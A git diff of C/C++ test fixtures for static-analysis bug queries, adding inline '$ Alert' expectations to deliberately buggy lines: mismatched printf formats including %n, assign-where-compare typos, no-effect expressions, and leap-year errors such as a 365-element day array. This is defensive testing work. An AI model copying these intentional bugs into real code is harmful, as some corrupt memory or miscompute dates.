printf("%I32u\n", ull); // BAD + printf("%I32i\n", ll); // BAD // $ Alert + printf("%I32u\n", ull); // BAD // $ Alert printf("%I32i\n", i32); // GOOD printf("%I32u\n", u32); // GOOD - printf("%I32i\n", i64); // BAD - printf("%I32u\n", u64); // BAD + printf("%I32i\n", i64); // BAD // $ Alert + printf("%I32u\n", u64); // BAD // $ Alert - printf("%I64i\n", i); // BAD - printf("%I64u\n", ui); // BAD - printf("%I64i\n", l); // BAD - printf("%I64u\n", ul); // BAD + printf("%I64i\n", i); // BAD // $ Alert + printf("%I64u\n", ui); // BAD // $ Alert + printf("%I64i\n", l); // BAD // $ Alert + printf("%I64u\n", ul); // BAD // $ Alert printf("%I64i\n", ll); // GOOD printf("%I64u\n", ull); // GOOD - printf("%I64i\n", i32); // BAD - printf("%I64u\n", u32); // BAD + printf("%I64i\n", i32); // BAD // $ Alert + printf("%I64u\n", u32); // BAD // $ Alert printf("%I64i\n", i64); // GOOD printf("%I64u\n", u64); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/real_world.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/real_world.h index eefb84993e74..6e592a95dc04 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/real_world.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/real_world.h @@ -58,9 +58,9 @@ void bar() printf("check %n", &i); // GOOD printf("check %n", &ui); // GOOD [dubious: int is written to unsigned int] printf("check %n", &si); // GOOD - printf("check %n", &s); // BAD: int is written to short - printf("check %hn", &i); // BAD: short is written to int - printf("check %hn", &ui); // BAD: short is written to unsigned int - printf("check %hn", &si); // BAD: short is written to signed int + printf("check %n", &s); // BAD: int is written to short // $ Alert + printf("check %hn", &i); // BAD: short is written to int // $ Alert + printf("check %hn", &ui); // BAD: short is written to unsigned int // $ Alert + printf("check %hn", &si); // BAD: short is written to signed int // $ Alert printf("check %hn", &s); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/wide_string.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/wide_string.h index 672329b62706..3f9abeb01824 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/wide_string.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/wide_string.h @@ -22,9 +22,9 @@ void test_wchar4(char c, const char cc, wchar_t wc, const wchar_t wcc) { printf("%c", c); // GOOD printf("%c", cc); // GOOD printf("%c", 'c'); // GOOD - printf("%c", "c"); // BAD + printf("%c", "c"); // BAD // $ Alert printf("%wc", wc); // GOOD printf("%wc", wcc); // GOOD printf("%wc", L'c'); // GOOD - printf("%wc", L"c"); // BAD + printf("%wc", L"c"); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/InconsistentCheckReturnNull.qlref b/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/InconsistentCheckReturnNull.qlref index 8ede85c2d6fd..676a003f0585 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/InconsistentCheckReturnNull.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/InconsistentCheckReturnNull.qlref @@ -1 +1,2 @@ -Likely Bugs/InconsistentCheckReturnNull.ql +query: Likely Bugs/InconsistentCheckReturnNull.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/test.c b/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/test.c index 0f7887666df9..f2383982771b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/test.c +++ b/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/test.c @@ -26,7 +26,7 @@ void f() { int* x7 = maybe_null_func(); if (x7) *x7 = 0; - int* x8 = maybe_null_func(); + int* x8 = maybe_null_func(); // $ Alert *x8 = 0; int* x9 = maybe_null_func(); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/Adding365daysPerYear.qlref b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/Adding365daysPerYear.qlref index 4420b542ca43..9352fe408e8c 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/Adding365daysPerYear.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/Adding365daysPerYear.qlref @@ -1 +1,2 @@ -Likely Bugs/Leap Year/Adding365DaysPerYear.ql +query: Likely Bugs/Leap Year/Adding365DaysPerYear.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/test.cpp index a14667c75ca5..8fb6d8e01551 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/test.cpp @@ -170,8 +170,8 @@ void antipattern2() qwLongTime += 365 * 24 * 60 * 60 * 10000000LLU; // copy back to a FILETIME - ft.dwLowDateTime = (DWORD)(qwLongTime & 0xFFFFFFFF); // BAD - ft.dwHighDateTime = (DWORD)(qwLongTime >> 32); // BAD + ft.dwLowDateTime = (DWORD)(qwLongTime & 0xFFFFFFFF); // BAD // $ Alert + ft.dwHighDateTime = (DWORD)(qwLongTime >> 32); // BAD // $ Alert // convert back to SYSTEMTIME for display or other usage FileTimeToSystemTime(&ft, &st); @@ -190,7 +190,7 @@ time_t mkTime(int days) tm.tm_hour = 0; tm.tm_mday = 0; tm.tm_mon = 0; - tm.tm_year = days / 365; // BAD + tm.tm_year = days / 365; // BAD // $ Alert // ... t = mktime(&tm); // convert tm -> time_t @@ -214,8 +214,8 @@ void checkedExample() qwLongTime += 365 * 24 * 60 * 60 * 10000000LLU; // copy back to a FILETIME - ft.dwLowDateTime = (DWORD)(qwLongTime & 0xFFFFFFFF); // GOOD [FALSE POSITIVE] - ft.dwHighDateTime = (DWORD)(qwLongTime >> 32); // GOOD [FALSE POSITIVE] + ft.dwLowDateTime = (DWORD)(qwLongTime & 0xFFFFFFFF); // GOOD [FALSE POSITIVE] // $ Alert + ft.dwHighDateTime = (DWORD)(qwLongTime >> 32); // GOOD [FALSE POSITIVE] // $ Alert // convert back to SYSTEMTIME for display or other usage if (FileTimeToSystemTime(&ft, &st) == 0) diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref index 70eae8e7edc9..d453e0c83be4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UncheckedLeapYearAfterYearModification/UncheckedReturnValueForTimeFunctions.qlref @@ -1 +1 @@ -Likely Bugs/Leap Year/UncheckedReturnValueForTimeFunctions.ql +query: Likely Bugs/Leap Year/UncheckedReturnValueForTimeFunctions.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/UnsafeArrayForDaysOfYear.qlref b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/UnsafeArrayForDaysOfYear.qlref index 4271a41e0faa..e0d1519153c6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/UnsafeArrayForDaysOfYear.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/UnsafeArrayForDaysOfYear.qlref @@ -1 +1,2 @@ -Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear.ql +query: Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/test.cpp index 7f6f2cfd3fe7..f76167c1893b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/UnsafeArrayForDaysOfYear/test.cpp @@ -14,7 +14,7 @@ class vector { void ArrayOfDays_Bug(int dayOfYear, int x) { // BUG - int items[365]; + int items[365]; // $ Alert items[dayOfYear - 1] = x; } @@ -22,7 +22,7 @@ void ArrayOfDays_Bug(int dayOfYear, int x) void ArrayOfDays_Bug2(int dayOfYear, int x) { // BUG - int *items = new int[365]; + int *items = new int[365]; // $ Alert items[dayOfYear - 1] = x; delete items; @@ -49,7 +49,7 @@ void ArrayOfDays_FalsePositive(int dayOfYear, int x) void VectorOfDays_Bug(int dayOfYear, int x) { // BUG - vector items(365); + vector items(365); // $ Alert items[dayOfYear - 1] = x; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/AssignWhereCompareMeant.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/AssignWhereCompareMeant.qlref index ca70196fa6b9..e4598d920438 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/AssignWhereCompareMeant.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/AssignWhereCompareMeant.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/AssignWhereCompareMeant.ql +query: Likely Bugs/Likely Typos/AssignWhereCompareMeant.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/test.cpp index 3cd181254673..c4dd2ff45101 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/AssignWhereCompareMeant/test.cpp @@ -24,25 +24,25 @@ class IntHolder { }; void f(int x) { - if (x = 3) { // BAD + if (x = 3) { // BAD // $ Alert } if ((x = 3)) { // GOOD: explicitly bracketed } - if (!(x = 3)) { // BAD + if (!(x = 3)) { // BAD // $ Alert } if (!((x = 3))) { // GOOD: explicitly bracketed } do { - } while (x = 0); // BAD + } while (x = 0); // BAD // $ Alert do { } while ((x = 0)); // GOOD: explicitly bracketed - if ((x = 3) && (x = 4)) { // BAD (x2) + if ((x = 3) && (x = 4)) { // BAD (x2) // $ Alert } if (((x = 3)) && ((x = 4))) { // GOOD: explicitly bracketed } - x = (x = 3) ? 2 : 1; // BAD + x = (x = 3) ? 2 : 1; // BAD // $ Alert x = ((x = 3)) ? 2 : 1; // GOOD: explicitly bracketed - assert(x = 2); // BAD + assert(x = 2); // BAD // $ Alert assert((x = 2)); // GOOD: explicitly bracketed int y; @@ -50,12 +50,12 @@ void f(int x) { if (y = 1) { // GOOD: y was not initialized so it is probably intentional. } y = 2; - if (y = 3) { // BAD: y has been initialized so it is probably a mistake. + if (y = 3) { // BAD: y has been initialized so it is probably a mistake. // $ Alert } int z = 1; - if (z = 2) { // BAD: z has been initialized so it is probably a mistake. + if (z = 2) { // BAD: z has been initialized so it is probably a mistake. // $ Alert } IntHolder holder1(x); IntHolder holder2(x); @@ -73,15 +73,15 @@ void g(int *i_p, int cond) { int i, j, k, x, y; static int s, t = 0; - if (global = 0) { // BAD: this is unlikely to be a deliberate initialization of global + if (global = 0) { // BAD: this is unlikely to be a deliberate initialization of global // $ Alert } - if (*i_p = 0) { // BAD + if (*i_p = 0) { // BAD // $ Alert } - if (s = 0) { // BAD + if (s = 0) { // BAD // $ Alert } - if (s = 0) { // BAD + if (s = 0) { // BAD // $ Alert } - if (t = 0) { // BAD + if (t = 0) { // BAD // $ Alert } for (i = 0, j = 0; i < 10; i++) { // GOOD @@ -89,7 +89,7 @@ void g(int *i_p, int cond) { } } - for (k = 0; !(k = 10); k++) { // BAD + for (k = 0; !(k = 10); k++) { // BAD // $ Alert } if (cond) { @@ -110,7 +110,7 @@ void h() { } int z = 0; - if(z = 1) { // BAD + if(z = 1) { // BAD // $ Alert } } @@ -131,26 +131,26 @@ void f3(int x, int y) { // as an assignment } - if((x == 1) && (y = 2)) { // BAD + if((x == 1) && (y = 2)) { // BAD // $ Alert } long z = x; - if(((z == 42) || (y = 2)) && (x == 1)) { // BAD + if(((z == 42) || (y = 2)) && (x == 1)) { // BAD // $ Alert } if((y = 2) && (x == z || x == 1)) { // GOOD } - if(((x == 42) || x == 1) && (y = 2)) { // BAD + if(((x == 42) || x == 1) && (y = 2)) { // BAD // $ Alert } if(x == 10 || (x == 42 && x == 1) && (y = 2)) { // GOOD } - if(x == 10 || ((x == 42) && (y = 2)) && (z == 1)) { // BAD + if(x == 10 || ((x == 42) && (y = 2)) && (z == 1)) { // BAD // $ Alert } - if((x == 10) || ((z == z) && (x == 1)) && (y = 2)) { // BAD + if((x == 10) || ((z == z) && (x == 1)) && (y = 2)) { // BAD // $ Alert } } @@ -163,11 +163,11 @@ void f4(int x, bool b) { if((x = 10) && use(x) && b) {} // GOOD: Same reason as above if((x = 10) && (use(x) && b)) {} // GOOD: Same reason as above - if(use(x) && b && (x = 10)) {} // BAD: The assignment is the last thing that happens in the comparison. + if(use(x) && b && (x = 10)) {} // BAD: The assignment is the last thing that happens in the comparison. // $ Alert // This doesn't match the usual pattern. - if((use(x) && b) && (x = 10)) {} // BAD: Same reason as above - if(use(x) && (b && (x = 10))) {} // BAD: Same reason as above + if((use(x) && b) && (x = 10)) {} // BAD: Same reason as above // $ Alert + if(use(x) && (b && (x = 10))) {} // BAD: Same reason as above // $ Alert - if((x = 10) || use(x)) {} // BAD: This doesn't follow the usual style of writing an assignment in + if((x = 10) || use(x)) {} // BAD: This doesn't follow the usual style of writing an assignment in // $ Alert // a boolean check. } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/CompareWhereAssignMeant.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/CompareWhereAssignMeant.qlref index 54f62d41b7bb..c197f0008961 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/CompareWhereAssignMeant.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/CompareWhereAssignMeant.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/CompareWhereAssignMeant.ql +query: Likely Bugs/Likely Typos/CompareWhereAssignMeant.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/ExprHasNoEffect.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/ExprHasNoEffect.qlref index 82a90f5413a9..662600c07dd1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/ExprHasNoEffect.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/ExprHasNoEffect.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/ExprHasNoEffect.ql +query: Likely Bugs/Likely Typos/ExprHasNoEffect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/test.cpp index 2fa421059058..845acbb81927 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/CompareWhereAssignMeant/test.cpp @@ -25,30 +25,30 @@ void f(void) { i = 1; - i == 1; + i == 1; // $ Alert[cpp/compare-where-assign-meant] - i == 1, i == 2; + i == 1, i == 2; // $ Alert[cpp/compare-where-assign-meant] Alert[cpp/useless-expression] - i = i == 1, i == 2; + i = i == 1, i == 2; // $ Alert[cpp/compare-where-assign-meant] - i = (i == 1, i == 2); + i = (i == 1, i == 2); // $ Alert[cpp/compare-where-assign-meant] if (({ int x = 3; x == 3; })) { return; } - if (({ int x = 3; x == 3; x; })) { + if (({ int x = 3; x == 3; x; })) { // $ Alert[cpp/compare-where-assign-meant] return; } - if (({ int x = 3; x == 3; x = 4; })) { + if (({ int x = 3; x == 3; x = 4; })) { // $ Alert[cpp/compare-where-assign-meant] return; } - i != 1; + i != 1; // $ Alert[cpp/useless-expression] IntHolder holder1(i); IntHolder holder2(i); holder1 = holder2; - holder1 == holder2; + holder1 == holder2; // $ Alert[cpp/compare-where-assign-meant] if(holder1 = holder2) { } if(holder1 == holder1) { @@ -69,6 +69,6 @@ void report_error(const char*); void test_inside_macro_expansion(int x, int y) { DOES_NOT_THROW(x == y); // GOOD - x == y; // BAD - x == ID(y); // BAD + x == y; // BAD // $ Alert[cpp/compare-where-assign-meant] + x == ID(y); // BAD // $ Alert[cpp/compare-where-assign-meant] } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.cpp index 0c7f9edacd19..58a2680f3b94 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.cpp @@ -10,7 +10,7 @@ struct person { bool hasName(person* p) { return p != NULL // This check is sensible, && p->name != NULL // as is this one. - && &p->name != NULL; // But this check is dubious. (BAD) + && &p->name != NULL; // But this check is dubious. (BAD) // $ Alert } // another example @@ -26,11 +26,11 @@ class myClass assert(this->y != NULL); assert(&this->y != NULL); // BAD [NOT DETECTED] assert(ptr->y != NULL); - assert(&ptr->y != NULL); // BAD + assert(&ptr->y != NULL); // BAD // $ Alert assert((ptr->y) != NULL); - assert(&(ptr->y) != NULL); // BAD + assert(&(ptr->y) != NULL); // BAD // $ Alert assert(ref.y != NULL); - assert(&(ref.y) != NULL); // BAD + assert(&(ref.y) != NULL); // BAD // $ Alert }; private: diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.qlref index 4e0443db7906..da788f52f504 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/DubiousNullCheck/DubiousNullCheck.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/DubiousNullCheck.ql \ No newline at end of file +query: Likely Bugs/Likely Typos/DubiousNullCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/CMakeFiles/CMakeScratch/TryCompile-abcdef/ExprHasNoEffect.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/CMakeFiles/CMakeScratch/TryCompile-abcdef/ExprHasNoEffect.qlref index 82a90f5413a9..662600c07dd1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/CMakeFiles/CMakeScratch/TryCompile-abcdef/ExprHasNoEffect.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/CMakeFiles/CMakeScratch/TryCompile-abcdef/ExprHasNoEffect.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/ExprHasNoEffect.ql +query: Likely Bugs/Likely Typos/ExprHasNoEffect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/ExprHasNoEffect.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/ExprHasNoEffect.qlref index 82a90f5413a9..662600c07dd1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/ExprHasNoEffect.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/ExprHasNoEffect.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/ExprHasNoEffect.ql +query: Likely Bugs/Likely Typos/ExprHasNoEffect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/ExprHasNoEffect.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/ExprHasNoEffect.qlref index 82a90f5413a9..662600c07dd1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/ExprHasNoEffect.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/ExprHasNoEffect.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/ExprHasNoEffect.ql +query: Likely Bugs/Likely Typos/ExprHasNoEffect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest.c.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest.c.c index 4ff7c2253358..8f949d876dae 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest.c.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest.c.c @@ -1,6 +1,6 @@ #include "conftest.h" int main3() { - strlen(""); // BAD: not a `conftest` file, as `conftest` is not directly followed by the extension or a sequence of numbers. + strlen(""); // BAD: not a `conftest` file, as `conftest` is not directly followed by the extension or a sequence of numbers. // $ Alert return 0; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest_abc.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest_abc.c index 88215d7434cd..102cfa4a8c22 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest_abc.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/autoconf/conftest_abc.c @@ -1,6 +1,6 @@ #include "conftest.h" int main1() { - strlen(""); // BAD: not a `conftest` file, as `conftest` is not directly followed by the extension or a sequence of numbers. + strlen(""); // BAD: not a `conftest` file, as `conftest` is not directly followed by the extension or a sequence of numbers. // $ Alert return 0; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/calls.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/calls.cpp index 2acdfcf80f8f..2de0aec1e365 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/calls.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/calls.cpp @@ -5,11 +5,11 @@ int external(); class Base { public: virtual int thingy() { - 1; // BAD + 1; // BAD // $ Alert } int our_thingy() { - Base::thingy(); // BAD + Base::thingy(); // BAD // $ Alert return 2; } }; diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/expr.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/expr.cpp index 56809a4e05fa..76a1669c3213 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/expr.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/expr.cpp @@ -5,9 +5,9 @@ int i; void comma_expr_test() { i++, i++; // GOOD - 0, i++; // BAD (first part) - i++, 0; // BAD (second part) - 0, 0; // BAD (whole) + 0, i++; // BAD (first part) // $ Alert + i++, 0; // BAD (second part) // $ Alert + 0, 0; // BAD (whole) // $ Alert } } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/meson-private/tmp_abc/ExprHasNoEffect.qlref b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/meson-private/tmp_abc/ExprHasNoEffect.qlref index 82a90f5413a9..662600c07dd1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/meson-private/tmp_abc/ExprHasNoEffect.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/meson-private/tmp_abc/ExprHasNoEffect.qlref @@ -1 +1,2 @@ -Likely Bugs/Likely Typos/ExprHasNoEffect.ql +query: Likely Bugs/Likely Typos/ExprHasNoEffect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/preproc.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/preproc.c index 2761476c474e..063bdd743761 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/preproc.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/preproc.c @@ -86,10 +86,10 @@ void test() fn1(); fn2(); fn3(); - fn4(); // has no effect + fn4(); // has no effect // $ Alert fn5(); fn6(); fn7(); fn8(); - fn9(); // has no effect + fn9(); // has no effect // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/template.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/template.cpp index ecc3d6246034..e6d6e6362c19 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/template.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/template.cpp @@ -16,7 +16,7 @@ void myTemplateTest() { Nothing n; i++; // GOOD (always has an effect) - n++; // BAD (never has an effect) + n++; // BAD (never has an effect) // $ Alert Increment(i); Increment(n); } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/templatey.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/templatey.cpp index 7d2b6b19777e..12665301e6c6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/templatey.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/templatey.cpp @@ -36,5 +36,5 @@ void call_add_numbers() int accum = 0; add_numbers(accum, 4); // GOOD add_numbers(accum, 10); // GOOD - pointless_add_numbers(accum, 20); // BAD + pointless_add_numbers(accum, 20); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.c b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.c index 1b2530fdff5b..d7b65299dad3 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.c @@ -4,27 +4,27 @@ extern int g(void); void f(int b) { int i; - 0; + 0; // $ Alert - ({ 1; 2; 3; }); - i = ({ 4; 5; 6; }); - i = ({ 7; 8; 9, 10; }); + ({ 1; 2; 3; }); // $ Alert + i = ({ 4; 5; 6; }); // $ Alert + i = ({ 7; 8; 9, 10; }); // $ Alert - i = 11, 12; - i = 13, 14, 15; - i = (16, 17); - i = (18, 19, 20); - 21, 22; - 23, 24, 25; + i = 11, 12; // $ Alert + i = 13, 14, 15; // $ Alert + i = (16, 17); // $ Alert + i = (18, 19, 20); // $ Alert + 21, 22; // $ Alert + 23, 24, 25; // $ Alert i = b ? 26 : 27; i = b ? g() : 28; i = b ? 29 : g(); i = b ? g() : g(); - b ? 30 : 31; - b ? g() : 32; - b ? 33 : g(); + b ? 30 : 31; // $ Alert + b ? g() : 32; // $ Alert + b ? 33 : g(); // $ Alert b ? g() : g(); } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.cpp index da4398f4105b..f46ed1d6722f 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Likely Typos/ExprHasNoEffect/test.cpp @@ -59,10 +59,10 